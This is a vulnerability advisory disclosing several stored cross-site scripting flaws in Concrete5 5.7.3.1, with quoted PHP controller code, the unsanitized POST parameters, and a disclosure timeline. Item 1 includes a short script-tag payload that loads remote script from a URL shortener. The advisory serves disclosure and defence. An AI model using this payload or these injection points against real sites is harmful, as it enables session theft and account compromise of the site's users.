------------------------------------------------------------------------- Concrete5 <= 5.7.3.1 Multiple Stored Cross-Site Scripting Vulnerabilities ------------------------------------------------------------------------- [-] Software Link: https://www.concrete5.org/ [-] Affected Versions: Version 5.7.3.1 and probably other versions. [-] Vulnerabilities Description: 1) User input passed through the "uEmail" and "uDefaultLanguage" POST parameters when registering a new account is not properly sanitized before being used to generate HTML output. This can be exploited by unauthenticated attackers to permanently store arbitrary script code within the Users database table, which might be executed by an authenticated user while browsing to the users page. NOTE: the "uDefaultLanguage" parameter cannot be longer than 32 characters, however this can still be exploited by e.g. using a URL shortener service to include arbitrary script code (such as <script src=//v.ht/x_s></script> which is exactly 32 characters). 2) The vulnerable code is located in /concrete/controllers/single_page/dashboard/system/registration/open.php: 13. public function update_registration_type() 14. { 15. if ($this->isPost()) { 16. Config::save('concrete.user.registration.email_registration', ($this->post('email_as_username') ? true : false)); 17. Config::save('concrete.user.registration.type', $this->post('registration_type')); 18. Config::save('concrete.user.registration.captcha', ($this->post('enable_registration_captcha')) ? true : false); 19. switch ($this->post('registration_type')) { 20. case "enabled": 21. Config::save('concrete.user.registration.enabled', true); 22. Config::save('concrete.user.registration.validate_email', false); 23. Config::save('concrete.user.registration.approval', false); 24. Config::save('concrete.user.registration.notification', $this->post('register_notification')); 25. Config::save( 26. 'concrete.user.registration.notification_email', 27. Loader::helper('security')->sanitizeString( 28. $this->post('register_notification_email'))); User input passed through the "register_notification_email" POST parameter is not properly sanitized before being stored into a configuration setting (the "sanitizeString()" method strips tags from the string but not double quotes). This can be exploited by an authenticated attacker to permanently store arbitrary script code within the database, which might be executed by another user while browsing to the "Public Registration Settings" page. NOTE: the vulnerability can be exploited only by authenticated users, however an attacker can leverage a CSRF vulnerability related to the "Public Registration Settings" page. 3) The vulnerable code is located in /concrete/controllers/single_page/dashboard/system/registration/profiles.php: 11. public function update_profiles() { 12. if ($this->isPost()) { 13. Config::save('concrete.user.profiles_enabled', ($this->post('public_profiles')?true:false)); 14. Config::save('concrete.user.gravatar.enabled', ($this->post('gravatar_fallback')?true:false)); 15. Config::save('concrete.user.gravatar.max_level', Loader::helper('security')->sanitizeString($this->post('gravatar_max_level'))); 16. Config::save('concrete.user.gravatar.image_set', Loader::helper('security')->sanitizeString($this->post('gravatar_image_set'))); 17. // $message = ($this->post('public_profiles')?t('Public profiles have been enabled'):t('Public profiles have been disabled.')); 18. if($this->post('public_profiles')) { 19. $this->redirect('/dashboard/system/registration/profiles/profiles_enabled'); User input passed through the "gravatar_max_level" e "gravatar_image_set" POST parameters is not properly sanitized before being stored into a configuration setting (the "sanitizeString()" method strips tags from the string but not double quotes). This can be exploited by an authenticated attacker to permanently store arbitrary script code within the database, which might be executed by another user while browsing to the "Public Profiles Settings" page. NOTE: the vulnerability can be exploited only by authenticated users, however an attacker can leverage a CSRF vulnerability related to the "Public Profiles Settings" page. 4) The vulnerable code is located in /concrete/controllers/single_page/dashboard/users/points/actions.php: 94. public function save() 95. { 96. if($this->post('upaID') > 0) { 97. $this->upa->load($this->post('upaID')); 98. if (!$this->upa->hasCustomClass()) { 99. $this->upa->upaHandle = $this->post('upaHandle'); 100. } 101. $this->upa->upaName = $this->post('upaName'); 102. $this->upa->upaDefaultPoints = $this->post('upaDefaultPoints'); 103. $this->upa->gBadgeID = $this->post('gBadgeID'); 104. if (!$this->upa->pkgID) { 105. // i hate this activerecord crap 106. $this->upa->pkgID = 0; 107. } 108. $this->upa->upaIsActive = 0; 109. if ($this->post('upaIsActive')) { 110. $this->upa->upaIsActive = 1; 111. } 112. 113. $this->upa->save(); 114. } else { 115. $upa = UserPointAction::add($this->post('upaHandle'), $this->post('upaName'), $this->post('upaDefaultPoints'), $this->post('gBadgeID'), $this->post('upaIsActive')); 116. } User input passed through the "upaHandle" and "upaName" POST parameters is not properly sanitized before being stored. This can be exploited by an authenticated attacker to permanently store arbitrary script code within the database, which might be executed by another user while browsing to the "Community Points Actions" page. NOTE: the vulnerability can be exploited only by authenticated users, however an attacker can leverage a CSRF vulnerability related to the "Community Points Actions" page. 5) The vulnerable code is located in /concrete/elements/files/add_to_sets.php: 110. if ($_POST['fsNew']) { 111. $type = ($_POST['fsNewShare'] == 1) ? FileSet::TYPE_PUBLIC : FileSet::TYPE_PRIVATE; 112. $fs = FileSet::createAndGetSet($_POST['fsNewText'], $type); 113. //print_r($fs); User input passed through the "fsNewText" POST parameter is not properly sanitized before being stored. This can be exploited by an authenticated attacker to permanently store arbitrary script code within the database, which might be executed by another user while browsing to the "Add to New Set" panel. NOTE: the vulnerability can be exploited only by authenticated users, however an attacker can leverage a CSRF vulnerability related to the "File Manager" page. 6) The vulnerable code is located in /concrete/controllers/single_page/dashboard/extend/connect.php: 18. public function connect_complete() { 19. $tp = new TaskPermission(); 20. if ($tp->canInstallPackages()) { 21. if (!$_POST['csToken']) { 22. $this->set('error', array(t('An unexpected error occurred when connecting your site to the marketplace.'))); 23. } else { 24. $config = \Core::make('config/database'); 25. $config->save('concrete.marketplace.token', $_POST['csToken']); 26. $config->save('concrete.marketplace.url_token', $_POST['csURLToken']); User input passed through the "csToken" and "csURLToken" POST parameters is not properly sanitized before being stored into a configuration setting. This can be exploited by an authenticated attacker to permanently store arbitrary script code within the database, which might be executed by another user while browsing to the "Extend Concrete5" pages. NOTE: the vulnerability can be exploited only by authenticated users, however an attacker can leverage a CSRF vulnerability related to the "Community Connect" page. 7) The vulnerable code is located in /concrete/controllers/single_page/dashboard/system/multilingual/translate_interface.php: 110. public function save_translation() 111. { 112. $mtID = intval($this->post('mtID')); 113. $translation = Translation::getByID($mtID); 114. if (is_object($translation)) { 115. $translation->updateTranslation($this->post('msgstr')); 116. } User input passed through the "msgstr" POST parameter is not properly sanitized before being stored. This can be exploited by an authenticated attacker to permanently store arbitrary script code within the database, which might be executed by another user while browsing to the "Translate Site Interface" page. NOTE: the vulnerability can be exploited only by authenticated users, however an attacker can leverage a CSRF vulnerability related to the "Translate Site Interface" page. [-] Solution: Update to a fixed version. [-] Disclosure Timeline: [05/05/2015] - Vulnerabilities details sent through HackerOne [02/10/2015] - CVE number requested [28/12/2015] - Vendor said the vulnerabilities should be fixed in the upstream [26/06/2016] - Vulnerabilities publicly disclosed on HackerOne [28/06/2016] - Publication of this advisory [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has not assigned a CVE identifier for these vulnerabilities. [-] Credits: Vulnerabilities discovered by Egidio Romano. [-] Original Advisory: http://karmainsecurity.com/KIS-2016-09 [-] Other References: https://hackerone.com/reports/59662